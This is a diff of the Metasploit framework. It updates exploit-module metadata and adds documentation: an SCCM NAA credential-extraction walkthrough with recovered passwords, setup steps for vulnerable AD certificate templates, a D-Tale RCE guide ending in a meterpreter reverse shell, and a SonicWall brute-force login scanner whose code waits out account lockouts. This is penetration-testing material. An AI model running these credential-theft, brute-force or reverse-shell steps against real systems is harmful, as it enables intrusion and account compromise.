-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2025-02-28 09:35:28 +0000",
    "path": "/modules/exploits/windows/browser/adobe_flatedecode_predictor02.rb",
    "is_install_path": true,
    "ref_name": "windows/browser/adobe_flatedecode_predictor02",
@@ -143798,7 +143990,7 @@
    "description": "This module exploits a stack-based buffer overflow in Green Dam Youth Escort\n        version 3.17 in the way it handles overly long URLs.\n        By setting an overly long URL, an attacker can overrun a buffer and execute\n        arbitrary code. This module uses the .NET DLL memory technique by Alexander\n        Sotirov and Mark Dowd and should bypass DEP, NX and ASLR.",
    "references": [
      "OSVDB-55126",
-      "URL-http://www.cse.umich.edu/~jhalderm/pub/gd/",
+      "URL-http://web.archive.org/web/20110426190759/http://www.cse.umich.edu/~jhalderm/pub/gd/",
      "EDB-8938",
      "URL-http://taossa.com/archive/bh08sotirovdowd.pdf"
    ],
@@ -143814,7 +144006,7 @@
    "targets": [
      "Windows XP SP0-SP3 / Windows Vista SP0-SP1 / IE 6.0 SP0-2 & IE 7.0"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2025-02-28 09:35:28 +0000",
    "path": "/modules/exploits/windows/browser/greendam_url.rb",
    "is_install_path": true,
    "ref_name": "windows/browser/greendam_url",
@@ -145123,7 +145315,7 @@
      "BID-58238",
      "URL-https://blogs.oracle.com/security/entry/security_alert_cve_2013_1493",
      "URL-http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html",
-      "URL-http://pastie.org/pastes/6581034"
+      "URL-http://web.archive.org/web/20161013042610/http://pastie.org/pastes/6581034"
    ],
    "platform": "Java,Windows",
    "arch": "",
@@ -145138,7 +145330,7 @@
      "Generic (Java Payload)",
      "Windows x86 (Native Payload)"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2025-02-07 12:36:11 +0000",
    "path": "/modules/exploits/windows/browser/java_cmm.rb",
    "is_install_path": true,
    "ref_name": "windows/browser/java_cmm",
@@ -145215,7 +145407,7 @@
      "URL-http://blog.harmonysecurity.com/2010/10/oracle-java-ie-browser-plugin-stack.html",
      "ZDI-10-206",
      "URL-http://code.google.com/p/skylined/issues/detail?id=23",
-      "URL-http://skypher.com/index.php/2010/10/13/issue-2-oracle-java-object-launchjnlp-docbase/",
+      "URL-http://web.archive.org/web/20130119152812/http://skypher.com:80/index.php/2010/10/13/issue-2-oracle-java-object-launchjnlp-docbase/",
      "URL-http://www.oracle.com/technetwork/topics/security/javacpuoct2010-176258.html"
    ],
    "platform": "Windows",
@@ -145230,7 +145422,7 @@
    "targets": [
      "Windows Universal (msvcr71.dll ROP)"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2025-02-28 09:35:28 +0000",
    "path": "/modules/exploits/windows/browser/java_docbase_bof.rb",
    "is_install_path": true,
    "ref_name": "windows/browser/java_docbase_bof",
@@ -145261,7 +145453,7 @@
      "OSVDB-63493",
      "BID-39077",
      "ZDI-10-060",
-      "URL-http://vreugdenhilresearch.nl/java-midi-parse-vulnerabilities/"
+      "URL-http://web.archive.org/web/20210624004250/http://vreugdenhilresearch.nl/java-midi-parse-vulnerabilities/"
    ],
    "platform": "Windows",
    "arch": "",
@@ -145275,7 +145467,7 @@
    "targets": [
      "Windows / Java 6 <=u18"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2025-02-28 09:35:28 +0000",
    "path": "/modules/exploits/windows/browser/java_mixer_sequencer.rb",
    "is_install_path": true,
    "ref_name": "windows/browser/java_mixer_sequencer",
@@ -145741,7 +145933,7 @@
    "references": [
      "CVE-2014-4936",
      "OSVDB-116050",
-      "URL-http://blog.0x3a.com/post/104954032239/cve-2014-4936-malwarebytes-anti-malware-and"
+      "URL-http://web.archive.org/web/20241212224255/http://blog.0x3a.com/post/104954032239/cve-2014-4936-malwarebytes-anti-malware-and"
    ],
    "platform": "Windows",
    "arch": "",
@@ -145755,7 +145947,7 @@
    "targets": [
      "Windows Universal"
    ],
-    "mod_time": "2022-06-10 08:47:41 +0000",
+    "mod_time": "2025-02-07 12:36:11 +0000",
    "path": "/modules/exploits/windows/browser/malwarebytes_update_exec.rb",
    "is_install_path": true,
    "ref_name": "windows/browser/malwarebytes_update_exec",
@@ -147390,7 +147582,7 @@
      "OSVDB-63749",
      "BID-39303",
      "MSB-MS10-026",
-      "URL-https://www.exploit-db.com/moaub-5-microsoft-mpeg-layer-3-audio-stack-based-overflow/",
+      "URL-http://web.archive.org/web/20110916145030/http://www.exploit-db.com/moaub-5-microsoft-mpeg-layer-3-audio-stack-based-overflow/",
      "URL-http://www.phreedom.org/research/bypassing-browser-memory-protections/"
    ],
    "platform": "Windows",
@@ -147405,7 +147597,7 @@
    "targets": [
      "Windows XP SP3 Automatic"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2025-02-28 09:35:28 +0000",
    "path": "/modules/exploits/windows/browser/ms10_026_avi_nsamplespersec.rb",
    "is_install_path": true,
    "ref_name": "windows/browser/ms10_026_avi_nsamplespersec",
@@ -150965,7 +151157,7 @@
      "CVE-2010-3275",
      "OSVDB-71277",
      "URL-http://www.coresecurity.com/content/vlc-vulnerabilities-amv-nsv-files",
-      "URL-http://git.videolan.org/?p=vlc/vlc-1.1.git;a=commitdiff;h=fe44129dc6509b3347113ab0e1a0524af1e0dd11"
+      "URL-http://web.archive.org/web/20130610070348/http://git.videolan.org/?p=vlc/vlc-1.1.git;a=commitdiff;h=fe44129dc6509b3347113ab0e1a0524af1e0dd11"
    ],
    "platform": "Windows",
    "arch": "",
@@ -150983,7 +151175,7 @@
      "Internet Explorer 8 on XP SP3",
      "Internet Explorer 7 on Vista"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2025-02-28 09:35:28 +0000",
    "path": "/modules/exploits/windows/browser/vlc_amv.rb",
    "is_install_path": true,
    "ref_name": "windows/browser/vlc_amv",
@@ -151014,7 +151206,7 @@
      "CVE-2012-1775",
      "OSVDB-80188",
      "URL-http://www.videolan.org/security/sa1201.html",
-      "URL-http://git.videolan.org/?p=vlc/vlc-2.0.git;a=commit;h=11a95cce96fffdbaba1be6034d7b42721667821c"
+      "URL-http://web.archive.org/web/20130612051447/http://git.videolan.org/?p=vlc/vlc-2.0.git;a=commit;h=11a95cce96fffdbaba1be6034d7b42721667821c"
    ],
    "platform": "Windows",
    "arch": "",
@@ -151030,7 +151222,7 @@
      "Internet Explorer 6 on XP SP3",
      "Internet Explorer 7 on XP SP3"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2025-02-28 09:35:28 +0000",
    "path": "/modules/exploits/windows/browser/vlc_mms_bof.rb",
    "is_install_path": true,
    "ref_name": "windows/browser/vlc_mms_bof",
@@ -152723,7 +152915,7 @@
      "CVE-2009-3459",
      "BID-36600",
      "OSVDB-58729",
-      "URL-http://blogs.adobe.com/psirt/2009/10/adobe_reader_and_acrobat_issue_1.html",
+      "URL-http://web.archive.org/web/20201207001443/https://blogs.adobe.com/psirt/2009/10/adobe_reader_and_acrobat_issue_1.html/",
      "URL-http://www.adobe.com/support/security/bulletins/apsb09-15.html"
    ],
    "platform": "Windows",
@@ -152738,7 +152930,7 @@
    "targets": [
      "Adobe Reader Windows Universal (JS Heap Spray)"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2025-02-28 09:35:28 +0000",
    "path": "/modules/exploits/windows/fileformat/adobe_flatedecode_predictor02.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/adobe_flatedecode_predictor02",
@@ -153099,7 +153291,7 @@
      "OSVDB-77529",
      "BID-50922",
      "URL-http://www.adobe.com/support/security/advisories/apsa11-04.html",
-      "URL-http://blog.9bplus.com/analyzing-cve-2011-2462",
+      "URL-http://web.archive.org/web/20210228195907/http://blog.9bplus.com/analyzing-cve-2011-2462/",
      "URL-https://sites.google.com/site/felipeandresmanzano/PDFU3DExploitJS_CVE_2009_2990.py?attredirects=0",
      "URL-http://contagiodump.blogspot.com/2011/12/adobe-zero-day-cve-2011-2462.html"
    ],
@@ -153115,7 +153307,7 @@
    "targets": [
      "Adobe Reader 9.4.0 / 9.4.5 / 9.4.6 on Win XP SP3"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2025-02-28 09:35:28 +0000",
    "path": "/modules/exploits/windows/fileformat/adobe_reader_u3d.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/adobe_reader_u3d",
@@ -158236,7 +158428,7 @@
    "description": "Module exploits a flaw in how the Equation Editor that\n        allows an attacker to execute arbitrary code in RTF files without\n        interaction. The vulnerability is caused by the Equation Editor,\n        to which fails to properly handle OLE objects in memory.",
    "references": [
      "CVE-2017-11882",
-      "URL-https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about",
+      "URL-http://web.archive.org/web/20211201000500/https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about",
      "URL-https://github.com/embedi/CVE-2017-11882"
    ],
    "platform": "Windows",
@@ -158251,7 +158443,7 @@
    "targets": [
      "Microsoft Office"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2025-02-28 09:35:28 +0000",
    "path": "/modules/exploits/windows/fileformat/office_ms17_11882.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/office_ms17_11882",
@@ -159707,7 +159899,7 @@
      "OSVDB-64446",
      "BID-39836",
      "URL-http://www.coresecurity.com/content/ms-visio-dxf-buffer-overflow",
-      "URL-https://www.exploit-db.com/moaub-8-microsoft-office-visio-dxf-file-stack-overflow/"
+      "URL-http://web.archive.org/web/20101113032001/http://www.exploit-db.com:80/moaub-8-microsoft-office-visio-dxf-file-stack-overflow/"
    ],
    "platform": "Windows",
    "arch": "",
@@ -159722,7 +159914,7 @@
      "Visio 2002 English on Windows XP SP3 Spanish",
      "Visio 2002 English on Windows XP SP3 English"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2025-02-28 09:35:28 +0000",
    "path": "/modules/exploits/windows/fileformat/visio_dxf_bof.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/visio_dxf_bof",
@@ -195242,11 +195434,11 @@
      "MOF upload",
      "Command"
    ],
-    "mod_time": "2024-10-23 11:17:22 +0000",
+    "mod_time": "2024-11-12 09:14:51 +0000",
    "path": "/modules/exploits/windows/smb/smb_relay.rb",
    "is_install_path": true,
    "ref_name": "windows/smb/smb_relay",
-    "check": false,
+    "check": true,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -892,7 +892,7 @@ In the following example the AUTO mode is used to issue a certificate for the MS
 authenticated.

 ```msf
-msf6 auxiliary(server/relay/esc8) > set RELAY_TARGETS 172.30.239.85
+msf6 auxiliary(server/relay/esc8) > set RHOSTS 172.30.239.85
 msf6 auxiliary(server/relay/esc8) > run
 [*] Auxiliary module running as background job 1.
 msf6 auxiliary(server/relay/esc8) > 
@@ -0,0 +1,150 @@
+## NAA Credential Exploitation
+
+The NAA account is used by some SCCM configurations in the policy deployment process. It does not require many privileges, but 
+in practice is often misconfigured to have excessive privileges.
+
+The account can be retrieved in various ways, many requiring local administrative privileges on an existing host. However,
+it can also be requested by an existing computer account, which by default most user accounts are able to create.
+
+
+## Module usage
+The `admin/dcerpc/samr_computer` module is generally used to first create a computer account, which requires no permissions:
+
+1. From msfconsole
+2. Do: `use auxiliary/admin/dcerpc/samr_account`
+3. Set the `RHOSTS`, `SMBUser` and `SMBPass` options
+   a. For the `ADD_COMPUTER` action, if you don't specify `ACCOUNT_NAME` or `ACCOUNT_PASSWORD` - one will be generated automatically
+   b. For the `DELETE_ACCOUNT` action, set the `ACCOUNT_NAME` option
+   c. For the `LOOKUP_ACCOUNT` action, set the `ACCOUNT_NAME` option
+4. Run the module and see that a new machine account was added
+
+Then the `auxiliary/admin/sccm/get_naa_credentials` module can be used:
+
+1. `use auxiliary/admin/sccm/get_naa_credentials`
+2. Set the `RHOST` value to a target domain controller (if LDAP autodiscovery is used)
+3. Set the `USERNAME` and `PASSWORD` information to a domain account
+4. Set the `COMPUTER_USER` and `COMPUTER_PASSWORD` to the values obtained through the `samr_computer` module
+5. Run the module to obtain the NAA credentials, if present.
+
+Alternatively, if the Management Point and Site Code are known, the module can be used without autodiscovery:
+
+1. `use auxiliary/admin/sccm/get_naa_credentials`
+2. Set the `COMPUTER_USER` and `COMPUTER_PASSWORD` to the values obtained through the `samr_computer` module
+3. Set the `MANAGEMENT_POINT` and `SITE_CODE` to the known values.
+4. Run the module to obtain the NAA credentials, if present.
+
+The management point and site code can be retrieved using the `auxiliary/gather/ldap_query` module, using the `ENUM_SCCM_MANAGEMENT_POINTS` action.
+
+See the Scenarios for a more detailed walk through
+
+## Options
+
+### RHOST, USERNAME, PASSWORD, DOMAIN, SESSION, RHOST
+Options used to authenticate to the Domain Controller's LDAP service for SCCM autodiscovery.
+
+### COMPUTER_USER, COMPUTER_PASSWORD
+
+Credentials for a computer account (may be created with the `samr_account` module). If you've retrieved the NTLM hash of
+a computer account, you can use that for COMPUTER_PASSWORD.
+
+### MANAGEMENT_POINT
+The SCCM server.
+
+### SITE_CODE
+The Site Code of the management point.
+
+## Scenarios
+In the following example the user `ssccm.lab\eve` is a low-privilege user.
+
+### Creating computer account
+
+```
+msf6 auxiliary(admin/dcerpc/samr_account) > run rhost=192.168.33.10 domain=sccm.lab username=eve password=iloveyou
+[*] Running module against 192.168.33.10
+
+[*] 192.168.33.10:445 - Adding computer
+[+] 192.168.33.10:445 - Successfully created sccm.lab\DESKTOP-2KVDWNZ3$
+[+] 192.168.33.10:445 -   Password: pJTrvFyDHiHnqtlqTTNYe2HPVpO3Yekj
+[+] 192.168.33.10:445 -   SID:      S-1-5-21-3875312677-2561575051-1173664991-1128
+[*] Auxiliary module execution completed
+```
+
+### Running with Autodiscovery
+Using the credentials just obtained with the `samr_account` module.
+
+```
+msf6 auxiliary(admin/sccm/get_naa_credentials) > options
+
+Module options (auxiliary/admin/sccm/get_naa_credentials):
+
+   Name              Current Setting  Required  Description
+   ----              ---------------  --------  -----------
+   COMPUTER_PASS                      yes       The password of the provided computer account
+   COMPUTER_USER                      yes       The username of a computer account
+   MANAGEMENT_POINT                   no        The management point (SCCM server) to use
+   SITE_CODE                          no        The site code to use on the management point
+   SSL               false            no        Enable SSL on the LDAP connection
+   VHOST                              no        HTTP server virtual host
+
+
+   Used when connecting via an existing SESSION:
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   SESSION  1                no        The session to run this module on
+
+
+   Used when making a new connection via RHOSTS:
+
+   Name      Current Setting  Required  Description
+   ----      ---------------  --------  -----------
+   DOMAIN                     no        The domain to authenticate to
+   PASSWORD                   no        The password to authenticate with
+   RHOSTS                     no        The domain controller (for autodiscovery). Not required if providing a management point and site code
+   RPORT     389              no        The LDAP port of the domain controller (for autodiscovery). Not required if providing a management point and site code (TCP)
+   USERNAME                   no        The username to authenticate with
+
+
+View the full module info with the info, or info -d command.
+msf6 auxiliary(admin/sccm/get_naa_credentials) > run rhost=192.168.33.10 username=eve domain=sccm.lab password=iloveyou computer_user=DESKTOP-2KVDWNZ3$ computer_pass=pJTrvFyDHiHnqtlqTTNYe2HPVpO3Yekj
+[*] Running module against 192.168.33.10
+
+[*] Discovering base DN automatically
+[*] 192.168.33.10:389 Discovered base DN: DC=sccm,DC=lab
+[+] Found Management Point: MECM.sccm.lab (Site code: P01)
+[*] Got SMS ID: BD0DC478-A71A-4348-BD14-B7E91335738E
+[*] Waiting 5 seconds for SCCM DB to update...
+[*] Got NAA Policy URL: http://<mp>/SMS_MP/.sms_pol?{c48754cc-090c-4c56-ba3d-532b5ce5e8a5}.2_00
+[+] Found valid NAA credentials: sccm.lab\sccm-naa:123456789
+[*] Auxiliary module execution completed
+```
+
+### Manual discovery
+
+```
+msf6 auxiliary(gather/ldap_query) > run rhost=192.168.33.10 username=eve domain=sccm.lab password=iloveyou
+[*] Running module against 192.168.33.10
+
+[*] 192.168.33.10:389 Discovered base DN: DC=sccm,DC=lab
+CN=SMS-MP-P01-MECM.SCCM.LAB,CN=System Management,CN=System,DC=sccm,DC=lab
+=========================================================================
+
+ Name           Attributes
+ ----           ----------
+ cn             SMS-MP-P01-MECM.SCCM.LAB
+ dnshostname    MECM.sccm.lab
+ mssmssitecode  P01
+
+[*] Query returned 1 result.
+[*] Auxiliary module execution completed
+
+msf6 auxiliary(gather/ldap_query) > use auxiliary/admin/sccm/get_naa_credentials
+
+msf6 auxiliary(admin/sccm/get_naa_credentials) > run computer_user=DESKTOP-2KVDWNZ3$ computer_pass=pJTrvFyDHiHnqtlqTTNYe2HPVpO3Yekj management_point=MECM.sccm.lab site_code=P01
+
+[*] Got SMS ID: BD0DC478-A71A-4348-BD14-B7E91335738E
+[*] Waiting 5 seconds for SCCM DB to update...
+[*] Got NAA Policy URL: http://<mp>/SMS_MP/.sms_pol?{c48754cc-090c-4c56-ba3d-532b5ce5e8a5}.2_00
+[+] Found valid NAA credentials: sccm.lab\sccm-naa:123456789
+[*] Auxiliary module execution completed
+```
@@ -79,6 +79,58 @@ a normal user account by analyzing the objects in LDAP.
 1. Scroll down and select the `ESC3-Template2` certificate, and select `OK`.
 1. The certificate should now be available to be issued by the CA server.

+### Setting up a ESC4 Vulnerable Certificate Template
+1. Follow the instructions above to duplicate the ESC2 template and name it `ESC4-Template`, then click `Apply`.
+1. Go to the `Security` tab.
+1. Under `Groups or usernames` select `Authenticated Users`
+1. Under `Permissions for Authenticated Users` select `Write` -> `Allow`.
+1. Click `Apply` and then click `OK` to issue the certificate.
+1. Go back to the `certsrv` screen and right click on the `Certificate Templates` folder.
+1. Click `New` followed by `Certificate Template to Issue`.
+1. Scroll down and select the `ESC3-Template2` certificate, and select `OK`.
+1. The certificate should now be available to be issued by the CA server.
+
+### Setting up a ESC13 Vulnerable Certificate Template
+1. Follow the instructions above to duplicate the ESC2 template and name it `ESC13`, then click `Apply`.
+1. Go to the `Extensions` tab, click the Issuance Policies entry, click the `Add` button, click the `New...` button.
+1. Name the new issuance policy `ESC13-Issuance-Policy`.
+4. Copy the Object Identifier as this will be needed later (ex: 11.3.6.1.4.1.311.21.8.12682474.6065318.6963902.6406785.3291287.83.1172775.12545198`).
+1. Leave the CPS location field blank.
+1. Click `Apply`.
+1. Open Active Directory Users and Computers, expand the domain on the left hand side.
+1. Right click `Users` and navigate to New -> Group.
+1. Enter `ESC13-Group` for the Group Name.
+1. Select `Universal` for Group scope and `Security` for Group type.
+1. Click `Apply`.
+1. Open ADSI Edit.
+1. In the left hand side right click `ADSI Edit` and select `Connect to...`.
+1. Under `Select a well known naming context` select `Default naming context`.
+1. Select the newly established connection, select the domain, select `CN=User`.
+1. On the right hand side find the recently created security group `CN=ESC13-Group`, right click select properties.
+1. Copy the value of the `distinguishedName` attribute, save this as we'll need it later.
+1. Back on the left hand side establish another connection, right click `ADSI Edit` and select `Connect to...`.
+1. This time under `Select a well known naming context` select `Configuration`.
+1. Select the newly established connection, select the domain, select `CN=Services` -> `CN=Public Key Services` -> `CN=OID`.
+1. In the right hand side find the object that corresponds to the Object Identifier saved earlier.
+1. The OID saved earlier ended in `12545198`, the object on the right will start with `CN=12545198.` followed by 34 hex characters. ex: `CN=12545198.7BCA239924D9515E63EA6B6F00748837`).
+1. Once located right click -> properties, select `msDS-OIDToGroupLink`.
+1. Paste the `distingushedName` of the security group saved above (ex: `CN=ESC13-Group,CN=Users,DC=demo,DC=lab`).
+1. Click `Apply`.
+1. Go back to the `certsrv` screen and right click on the `Certificate Templates` folder.
+1. Click `New` followed by `Certificate Template to Issue`.
+1. Scroll down and select the `ESC13-Template` certificate, and select `OK`.
+1. The certificate should now be available to be issued by the CA server.
+
+### Setting up a ESC15 Vulnerable Certificate Template
+1. ESC15 depends on the schema version of the template being version 1 - which can no longer be created so we will edit an existing template that is schema version 1.
+1. Right click the `WebServer` template, select properties.
+1. Go to the Security Tab.
+1. Under `Groups or usernames` select `Authenticated Users`.
+1. Under `Permissions for Authenticated Users` select `Enroll` -> `Allow`.
+1. Click Apply.
+1. Go back to the `certsrv` screen and right click on the `Certificate Templates` folder and ensure `WebServer` is listed, if it's not, add it.
+1. The certificate should now be available to be issued by the CA server.
+
 ## Module usage

 1. Do: Start msfconsole
@@ -0,0 +1,19 @@
+## Description
+
+The module performs bruteforce attack against SonicWall NSv (Network Security Virtual).
+It allows to attack both regular SSLVPN user and admin as well. The module will automatically perform attack against SSLVPN user if `DOMAIN` parameter is not empty.
+
+## Vulnerable Application
+
+- [SonicWall](https://www.sonicwall.com/resources/trials-landing/sonicwall-nsv-next-gen-virtual-firewall-trial)
+
+## Verification Steps
+
+1. `use auxiliary/scanner/sonicwall/login_scanner`
+2. `set RHOSTS [IP]`
+3. either `set USERNAME [username]` or `set USERPASS_FILE [usernames file]`
+4. either `set PASSWORD [password]` or `set PASS_FILE [passwords file]`
+5. `set DOMAIN [domain to attack/empty string to attack admin account]`
+6. `run`
+
+
@@ -0,0 +1,110 @@
+## Vulnerable Application
+
+This exploit effectively serves as a bypass for CVE-2024-3408.
+An attacker can override global state to enable custom filters, which then facilitates remote code execution.
+Specifically, this vulnerability leverages the ability to manipulate global application settings
+to activate the enable_custom_filters feature, typically restricted to trusted environments.
+Once enabled, the /test-filter endpoint of the Custom Filters functionality can be exploited to execute arbitrary system commands.
+
+The vulnerability affects:
+
+    * D-Tale <= 3.15.1
+
+This module was successfully tested on:
+
+    * D-Tale 3.15.1 installed on Ubuntu 24.04
+    * D-Tale 3.12.0 installed on Ubuntu 22.04
+    * D-Tale 3.10.0 installed on Ubuntu 22.04
+    * D-Tale 3.0.0 installed on Ubuntu 22.04
+    * D-Tale 2.5.1 installed on Ubuntu 22.04
+    * D-Tale 2.4.0 installed on Ubuntu 22.04
+
+
+### Installation
+
+1. `pip install 'dtale==3.15.1'`
+
+2. `dtale --host 0.0.0.0`
+
+
+## Verification Steps
+
+1. Install the application
+2. Start msfconsole
+3. Do: `use exploit/linux/http/dtale_rce_cve_2025_0655`
+4. Do: `run lhost=<lhost> rhost=<rhost>`
+5. You should get a meterpreter
+
+
+## Options
+
+
+## Scenarios
+```
+msf6 > use exploit/linux/http/dtale_rce_cve_2025_0655
+[*] Using configured payload cmd/linux/http/x64/meterpreter_reverse_tcp
+msf6 exploit(linux/http/dtale_rce_cve_2025_0655) > options
+
+Module options (exploit/linux/http/dtale_rce_cve_2025_0655):
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT    40000            yes       The target port (TCP)
+   SSL      false            no        Negotiate SSL/TLS for outgoing connections
+   VHOST                     no        HTTP server virtual host
+
+
+Payload options (cmd/linux/http/x64/meterpreter_reverse_tcp):
+
+   Name            Current Setting  Required  Description
+   ----            ---------------  --------  -----------
+   FETCH_COMMAND   CURL             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
+   FETCH_DELETE    true             yes       Attempt to delete the binary after execution
+   FETCH_FILELESS  false            yes       Attempt to run payload without touching disk, Linux ≥3.17 only
+   FETCH_SRVHOST                    no        Local IP to use for serving payload
+   FETCH_SRVPORT   8080             yes       Local port to use for serving payload
+   FETCH_URIPATH                    no        Local URI to use for serving payload
+   LHOST                            yes       The listen address (an interface may be specified)
+   LPORT           4444             yes       The listen port
+
+
+   When FETCH_FILELESS is false:
+
+   Name                Current Setting  Required  Description
+   ----                ---------------  --------  -----------
+   FETCH_FILENAME      agAyokIhdJZ      no        Name to use on remote system when storing payload; cannot contain spaces or slashes
+   FETCH_WRITABLE_DIR  /tmp             yes       Remote writable dir to store payload; cannot contain spaces
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Linux Command
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(linux/http/dtale_rce_cve_2025_0655) > run lhost=192.168.56.1 rhost=192.168.56.17
+[*] Started reverse TCP handler on 192.168.56.1:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Version 3.15.1 detected.
+[*] Use data_id: 1
+[*] Updated the enable_custom_filters to true.
+[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.17:33210) at 2025-03-03 20:49:53 +0900
+[*] Successfully executed the payload.
+[*] Successfully cleaned up data_id: 1
+
+meterpreter > getuid
+Server username: ubu
+meterpreter > sysinfo
+Computer     : 192.168.56.17
+OS           : Ubuntu 22.04 (Linux 6.8.0-52-generic)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > 
+```
@@ -0,0 +1,153 @@
+require 'metasploit/framework/login_scanner/http'
+
+module Metasploit
+  module Framework
+    module LoginScanner
+      # SonicWall Login Scanner supporting
+      # - User Login
+      # - Admin Login
+      class SonicWall < HTTP
+
+        DEFAULT_SSL_PORT = [443, 4433]
+        LIKELY_PORTS = [443, 4433]
+        LIKELY_SERVICE_NAMES = [
+          'SonicWall Network Security'
+        ]
+        PRIVATE_TYPES = [:password]
+        REALM_KEY = nil
+
+        def initialize(scanner_config, domain)
+          @domain = domain
+          super(scanner_config)
+        end
+
+        def req_params_base
+          {
+            'method' => 'POST',
+            'uri' => normalize_uri('/api/sonicos/auth'),
+            'ctype' => 'application/json',
+            # Force SSL as the application uses non-standard TCP port for HTTPS - 4433
+            'ssl' => true
+          }
+        end
+
+        def auth_details_req
+          params = req_params_base
+
+          #
+          # Admin and SSLVPN user login procedure differs only in usage of domain field in JSON data
+          #
+          params.merge!({
+            'data' => JSON.pretty_generate(@domain.empty? ? {
+              'override' => false,
+              'snwl' => true
+            } : { 'domain' => @domain, 'override' => false, 'snwl' => true })
+          })
+          return params
+        end
+
+        def auth_req(header)
+          params = req_params_base
+
+          params.merge!({
+            'headers' =>
+            {
+              'Authorization' => header.join(', ')
+            }
+          })
+
+          params.merge!({
+            'data' => JSON.pretty_generate(@domain.empty? ? {
+              'override' => false,
+              'snwl' => true
+            } : { 'domain' => @domain, 'override' => false, 'snwl' => true })
+          })
+
+          return params
+        end
+
+        def get_auth_details(username, password)
+          send_request(auth_details_req)
+        end
+
+        def try_login(header)
+          send_request(auth_req(header))
+        end
+
+        def get_resp_msg(msg)
+          msg.dig('status', 'info', 0, 'message')
+        end
+
+        def check_setup
+          request_params = {
+            'method' => 'GET',
+            'uri' => normalize_uri('/sonicui/7/login/')
+          }
+          res = send_request(request_params)
+          if res&.code == 200 && res.body&.include?('SonicWall')
+            return false
+          end
+
+          'Unable to locate "SonicWall" in body. (Is this really SonicWall?)'
+        end
+
+        #
+        # The login procedure is two-step procedure for SonicWall due to HTTP Digest Authentication. In the first request, client receives data,cryptographic hashes and algorithm selection from server. It should calculate final response hash from username, password and additional data received from server. The second request contains all this information.
+        #
+        def do_login(username, password, depth)
+          return { status: ::Metasploit::Model::Login::Status::UNABLE_TO_CONNECT, proof: 'Waiting too long in lockout' } if depth >= 2
+
+          #-- get authentication details from first request
+          res = get_auth_details(username, password)
+
+          return { status: ::Metasploit::Model::Login::Status::UNABLE_TO_CONNECT, proof: 'Invalid response' } unless res
+          return { status: ::Metasploit::Model::Login::Status::UNABLE_TO_CONNECT, proof: 'Failed to receive a authentication details' } unless res&.headers && res.headers.key?('X-SNWL-Authenticate')
+
+          res.headers['X-SNWL-Authenticate'] =~ /Digest (.*)/
+
+          parameters = {}
+          ::Regexp.last_match(1).split(/,[[:space:]]*/).each do |p|
+            k, v = p.split('=', 2)
+            parameters[k] = v.gsub('"', '')
+          end
+          return { status: ::Metasploit::Model::Login::Status::UNABLE_TO_CONNECT, proof: 'Incorrect authentication header' } if parameters.empty?
+
+          digest_auth = Rex::Proto::Http::AuthDigest.new
+          auth_header = digest_auth.digest(username, password, 'POST', '/api/sonicos/auth', parameters)
+          return { status: ::Metasploit::Model::Login::Status::UNABLE_TO_CONNECT, proof: 'Could not calculate hash' } unless auth_header
+
+          #-- send the actual request with all hashes and information
+
+          res = try_login(auth_header)
+
+          return { status: ::Metasploit::Model::Login::Status::SUCCESSFUL, proof: res.to_s } if res&.code == 200
+
+
+          msg_json = res.get_json_document
+
+          return { status: ::Metasploit::Model::Login::Status::INCORRECT, proof: res.to_s } unless msg_json
+          msg = get_resp_msg(msg_json)
+
+          if msg == 'User is locked out'
+            sleep(5 * 60)
+            return do_login(username, password, depth + 1)
+          end
+
+          return { status: ::Metasploit::Model::Login::Status::INCORRECT, proof: msg }
+        end
+
+        def attempt_login(credential)
+          result_options = {
+            credential: credential,
+            host: @host,
+            port: @port,
+            protocol: 'tcp',
+            service_name: 'sonicwall'
+          }
+          result_options.merge!(do_login(credential.public, credential.private, 1))
+          Result.new(result_options)
+        end
+      end
+    end
+  end
+end
@@ -94,6 +94,10 @@ module Metasploit
          info
        end

+        def self.is_posix(platform)
+          return ['unifi','linux','osx','solaris','bsd','hpux','aix'].include?(platform)
+        end
+
        def self.get_platform_from_info(info)
          case info
          when /unifi\.version|UniFiSecurityGateway/i # Ubiquiti Unifi.  uname -a is left in, so we got to pull before Linux
@@ -215,6 +215,11 @@ Shell Banner:
    print_line
  end

+  def escape_arg(arg)
+    # By default we don't know what the escaping is. It's not ideal, but subclasses should do their own appropriate escaping
+    arg
+  end
+
  def cmd_background(*args)
    if !args.empty?
      # We assume that background does not need arguments
@@ -6,43 +6,8 @@ module Msf::Sessions
      super
    end

-    def shell_command_token(cmd,timeout = 10)
-      shell_command_token_unix(cmd,timeout)
-    end
-
